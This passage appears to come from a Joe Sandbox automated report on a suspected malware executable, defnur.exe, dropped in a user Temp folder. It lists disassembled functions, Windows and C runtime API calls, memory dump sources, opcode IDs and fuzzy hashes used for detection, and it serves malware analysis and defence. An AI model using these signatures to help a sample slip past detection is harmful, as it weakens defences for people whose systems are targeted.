                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CB01283211D31E7E962427756E894373B85EB11773733C229FB18A00E3EF914C1665B8
                                                                                                                                                                                                                                                    Function 00E170AE Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 132fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E1717E
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E171A7
                                                                                                                                                                                                                                                    • SetEndOfFile.KERNEL32(00000000,9,00000000,00E13BA4,?,?,?,?,?,?,?,00E1390D,00E13BA4,00000000), ref: 00E171D9
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,00E1390D,00E13BA4,00000000,?,?,?,?,00000000), ref: 00E171F5
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2389300866.0000000000DD1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00DD0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389268559.0000000000DD0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389361077.0000000000E21000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389397591.0000000000E36000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389434516.0000000000E3D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_dd0000_defnur.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _free$ErrorFileLast
                                                                                                                                                                                                                                                    • String ID: 9
                                                                                                                                                                                                                                                    • API String ID: 1547350101-3349311068
                                                                                                                                                                                                                                                    • Opcode ID: a6d6ddde97a868763b464736dda2f9d744167de9cce8e411ad6c90101f356344
                                                                                                                                                                                                                                                    • Instruction ID: 21928e197c42bc1f5d1f63a43c7a8e6d19595c08dd1d3c59aeeded0a67f4cd89
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a6d6ddde97a868763b464736dda2f9d744167de9cce8e411ad6c90101f356344
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9741F372A06205BADB116BB8CC42ADE36F6AF44764F243590F9A4F72D2DA30C9C18760
                                                                                                                                                                                                                                                    Function 00E0F567 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exe, xrefs: 00E0F56C
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2389300866.0000000000DD1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00DD0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389268559.0000000000DD0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389361077.0000000000E21000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389397591.0000000000E36000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389434516.0000000000E3D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_dd0000_defnur.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exe
                                                                                                                                                                                                                                                    • API String ID: 0-1814373646
                                                                                                                                                                                                                                                    • Opcode ID: 14cb34abbf347fa77e6e7022d483909f8f28290510d81597d560541ff091c5ea
                                                                                                                                                                                                                                                    • Instruction ID: 4f58f7237c3f3117c7b5b6c1e141e693953b18b74badee7444554c82925cf1cf
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 14cb34abbf347fa77e6e7022d483909f8f28290510d81597d560541ff091c5ea
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9C21DE71600209BFDB30AF619C8096B77ADEF64368B109564F514FB6E0EB31EDA087E0
                                                                                                                                                                                                                                                    Function 00DFD927 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00DFD9E8,?,?,00000000,?,?,00DFDA9A,00000002,FlsGetValue,00E233D8,00E233E0,?), ref: 00DFD9B7
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2389300866.0000000000DD1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00DD0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389268559.0000000000DD0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389361077.0000000000E21000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389397591.0000000000E36000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389434516.0000000000E3D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_dd0000_defnur.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                                                                                    • String ID: api-ms-
                                                                                                                                                                                                                                                    • API String ID: 3664257935-2084034818
                                                                                                                                                                                                                                                    • Opcode ID: 08a898a3391e7d2279e775079d2c4a0f578433123589eccf5a127a8bf9e1de7d
                                                                                                                                                                                                                                                    • Instruction ID: 9268cd23d9a354efe3317a9a38a36c5938b3b47079d5b0c80105f422e1625683
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 08a898a3391e7d2279e775079d2c4a0f578433123589eccf5a127a8bf9e1de7d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2911E732A41229ABDF315BA99C00B6973979B01770F1A4250FE55FB180D7B0EE018EF1
                                                                                                                                                                                                                                                    Function 00DFDDC2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00DFDDB7,?,?,00DFDD7F,?,?,?), ref: 00DFDDD7
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00DFDDEA
                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00DFDDB7,?,?,00DFDD7F,?,?,?), ref: 00DFDE0D
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2389300866.0000000000DD1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00DD0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389268559.0000000000DD0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389361077.0000000000E21000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389397591.0000000000E36000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389434516.0000000000E3D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_dd0000_defnur.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                    • Opcode ID: 832bcf6b27e541ffc1e71c23c14d52b3fdf87a87fb795951dcd821cb47bd16a8
                                                                                                                                                                                                                                                    • Instruction ID: 3f6763e04e609403982453905fba02645c1c7e49501816470b746bd0fdb6b558
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 832bcf6b27e541ffc1e71c23c14d52b3fdf87a87fb795951dcd821cb47bd16a8
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 66F0823160021CFBDB21AB51ED0ABAE7A6AEB20755F1540A0F500B10A0CB748F05DAA0
                                                                                                                                                                                                                                                    Function 00E1785C Relevance: 7.7, APIs: 5, Instructions: 244COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2389300866.0000000000DD1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00DD0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389268559.0000000000DD0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389361077.0000000000E21000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389397591.0000000000E36000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389434516.0000000000E3D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_dd0000_defnur.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: __alloca_probe_16__freea$Info
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2330168043-0
                                                                                                                                                                                                                                                    • Opcode ID: 016241b557718a72dfc886fa0db00301b0a6c1a15aa945e40b3e7ac4bcbfa1a4
                                                                                                                                                                                                                                                    • Instruction ID: 809f58a4f708f2b6eeddf845147d28acd292e795ee1b58c5ca2260489710a4ce
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 016241b557718a72dfc886fa0db00301b0a6c1a15aa945e40b3e7ac4bcbfa1a4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BA81D472D082199BDF209F64C841AEF7BB5EF49B54F192055E984B7241D731DDC4CBA0
                                                                                                                                                                                                                                                    Function 00E0C356 Relevance: 7.7, APIs: 5, Instructions: 199COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 00E0C3DA
                                                                                                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 00E0C4A0
                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 00E0C50C
                                                                                                                                                                                                                                                      • Part of subcall function 00E08305: HeapAlloc.KERNEL32(00000000,?,?,?,00E0FA70,00000220,?,?,?,?,?,?,00DFEFF2,?), ref: 00E08337
                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 00E0C515
                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 00E0C538
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2389300866.0000000000DD1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00DD0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389268559.0000000000DD0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389361077.0000000000E21000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389397591.0000000000E36000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389434516.0000000000E3D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_dd0000_defnur.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1096550386-0
                                                                                                                                                                                                                                                    • Opcode ID: 731b5faf1b679eb8b00f710fc8eaa573df4feb2b03aa78e037cf88276d70e6c1
                                                                                                                                                                                                                                                    • Instruction ID: d88caa35b29a3db57f62bdacd851c7f82f1ae6d3f12ca4dc849431d08f9db552
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 731b5faf1b679eb8b00f710fc8eaa573df4feb2b03aa78e037cf88276d70e6c1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0951C472600216AFEB215FA4CC85EBF36AAEF44794F355229FD08B71D0DB34DC8196A0
                                                                                                                                                                                                                                                    Function 00DF7030 Relevance: 7.7, APIs: 5, Instructions: 183COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2389300866.0000000000DD1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00DD0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389268559.0000000000DD0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389361077.0000000000E21000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389397591.0000000000E36000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389434516.0000000000E3D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_dd0000_defnur.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Mtx_unlock$Cnd_broadcastConcurrency::cancel_current_task
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3354401312-0
                                                                                                                                                                                                                                                    • Opcode ID: 403800c1b99fc37b8fa50b84888c6a6c25d8881232aa02c9e9235780bc0322ee
                                                                                                                                                                                                                                                    • Instruction ID: 7e6cfc65f846ba8f980423e26c5b9d8d0e74a250dc23620b8b2fdd33d7d2eb61
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 403800c1b99fc37b8fa50b84888c6a6c25d8881232aa02c9e9235780bc0322ee
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B9617B70901209DFDF14DFA4C944BEEBBB8FF05304F158169E905AB242DB35AA09CBB1
                                                                                                                                                                                                                                                    Function 00E0072C Relevance: 7.6, APIs: 5, Instructions: 141pipeCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetFileType.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00E0065E), ref: 00E0074E
                                                                                                                                                                                                                                                    • GetFileInformationByHandle.KERNEL32(?,?), ref: 00E007A8
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00E0065E,?,000000FF,00000000,00000000), ref: 00E00836
                                                                                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 00E0083D
                                                                                                                                                                                                                                                    • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 00E0087A
                                                                                                                                                                                                                                                      • Part of subcall function 00E00AA2: __dosmaperr.LIBCMT ref: 00E00AD7
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2389300866.0000000000DD1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00DD0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389268559.0000000000DD0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389361077.0000000000E21000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389397591.0000000000E36000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389434516.0000000000E3D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_dd0000_defnur.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1206951868-0
                                                                                                                                                                                                                                                    • Opcode ID: 911977689d4b338079ce4f393fde7c5c685d578a11a8ce769237d12302ecbde8
                                                                                                                                                                                                                                                    • Instruction ID: 9a1b899d46cc154e4bff7ae6fbee6911833b5e3f25bd81d480d284d2420a1820
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 911977689d4b338079ce4f393fde7c5c685d578a11a8ce769237d12302ecbde8
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 32416075900308AFDB28DFA5DC45AAFBBF9FF88300B049429F556E3291E7309984CB60
                                                                                                                                                                                                                                                    Function 00DF4E30 Relevance: 7.6, APIs: 5, Instructions: 107COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00DF4E66
                                                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00DF4E86
                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00DF4EA6
                                                                                                                                                                                                                                                    • std::_Facet_Register.LIBCPMT ref: 00DF4F41
                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00DF4F59
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2389300866.0000000000DD1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00DD0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389268559.0000000000DD0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389361077.0000000000E21000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389397591.0000000000E36000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389434516.0000000000E3D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_dd0000_defnur.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 459529453-0
                                                                                                                                                                                                                                                    • Opcode ID: 61435aeed63c17139e1dbc70d2caa9027cc790f48fe7a4d26017f288c7d29a9f
                                                                                                                                                                                                                                                    • Instruction ID: 6ecd1ed78fed1b4e6c9ea6a0330a06e9676de27793af19ed518763e546e09e31
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 61435aeed63c17139e1dbc70d2caa9027cc790f48fe7a4d26017f288c7d29a9f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BA41AE719002199FCB24DF55D841BBFBBB4FF40710F26815AEA0AAB341DB30AD05CBA1
                                                                                                                                                                                                                                                    Function 00E10DDB Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E10DF3
                                                                                                                                                                                                                                                      • Part of subcall function 00E080D6: HeapFree.KERNEL32(00000000,00000000,?,00E1107C,?,00000000,?,?,?,00E1131F,?,00000007,?,?,00E117C4,?), ref: 00E080EC
                                                                                                                                                                                                                                                      • Part of subcall function 00E080D6: GetLastError.KERNEL32(?,?,00E1107C,?,00000000,?,?,?,00E1131F,?,00000007,?,?,00E117C4,?,?), ref: 00E080FE
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E10E05
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E10E17
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E10E29
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E10E3B
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2389300866.0000000000DD1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00DD0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389268559.0000000000DD0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389361077.0000000000E21000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389397591.0000000000E36000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389434516.0000000000E3D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_dd0000_defnur.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                                                                    • Opcode ID: 39a71ff41b5d443f82b11e879341e0d910c8e9309a01a0fc58efa11cdeb5c288
                                                                                                                                                                                                                                                    • Instruction ID: dcf41a39c47f50903e537a12fe2567beb9d4b24d309a4488863e07acc5aa416b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 39a71ff41b5d443f82b11e879341e0d910c8e9309a01a0fc58efa11cdeb5c288
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D8F01232504204BBDE35EB66E585C9B77E9FB007147656C05F498F7A51CBB1FCC44AA0
                                                                                                                                                                                                                                                    Function 00DD4910 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 64COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ___std_exception_copy.LIBVCRUNTIME ref: 00DD499F
                                                                                                                                                                                                                                                      • Part of subcall function 00DFAF76: RaiseException.KERNEL32(E06D7363,00000001,00000003,00E339C4,?,?,?,00E339C4), ref: 00DFAFD6
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2389300866.0000000000DD1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00DD0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389268559.0000000000DD0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389361077.0000000000E21000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389397591.0000000000E36000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389434516.0000000000E3D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_dd0000_defnur.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExceptionRaise___std_exception_copy
                                                                                                                                                                                                                                                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                                                                    • API String ID: 3109751735-1866435925
                                                                                                                                                                                                                                                    • Opcode ID: 79d8edf60fcb735b2b5ebaf86fb830c6f52f5023956c7bc9feaafe66d4af5140
                                                                                                                                                                                                                                                    • Instruction ID: 6f52efb027a388c2117169af1413dc29f748dd5b55a46ae595b1bc1d0c519aec
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 79d8edf60fcb735b2b5ebaf86fb830c6f52f5023956c7bc9feaafe66d4af5140
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B911DFB16007086BC714DB59E812BAAB3E8EFA1310F24C52AB9599B641E770E910CB71
                                                                                                                                                                                                                                                    Function 00E090E5 Relevance: 6.3, APIs: 4, Instructions: 320COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2389300866.0000000000DD1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00DD0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389268559.0000000000DD0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389361077.0000000000E21000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389397591.0000000000E36000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389434516.0000000000E3D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_dd0000_defnur.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _strrchr
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3213747228-0
                                                                                                                                                                                                                                                    • Opcode ID: ed276365596a8a1063d24e94a118d056c93bad8c71ebdf723596cc360760eaf0
                                                                                                                                                                                                                                                    • Instruction ID: 755e171b61d6445a0c031068b7f613fa9abd8766b023480030773d7cac5fba5a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ed276365596a8a1063d24e94a118d056c93bad8c71ebdf723596cc360760eaf0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6FB16831A01286AFDB11CF68C8917EEBBE5EF55304F259169E855FB2C3D6388D81CB60
                                                                                                                                                                                                                                                    Function 00DD93D0 Relevance: 6.2, APIs: 4, Instructions: 181COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetVersionExW.KERNEL32(0000011C,E7FD9D7B,0000000F,00000000), ref: 00DD944A
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2389300866.0000000000DD1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00DD0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389268559.0000000000DD0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389361077.0000000000E21000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389397591.0000000000E36000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389434516.0000000000E3D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_dd0000_defnur.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Version
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1889659487-0
                                                                                                                                                                                                                                                    • Opcode ID: caccbcb103bfb760264f5c8f523063bf7cff7594efa511aa14f6322009004cc3
                                                                                                                                                                                                                                                    • Instruction ID: f7d0f28a57d2222f4e2e0622105dfdde1462efb9b22597a9a2a37d07b08488f9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: caccbcb103bfb760264f5c8f523063bf7cff7594efa511aa14f6322009004cc3
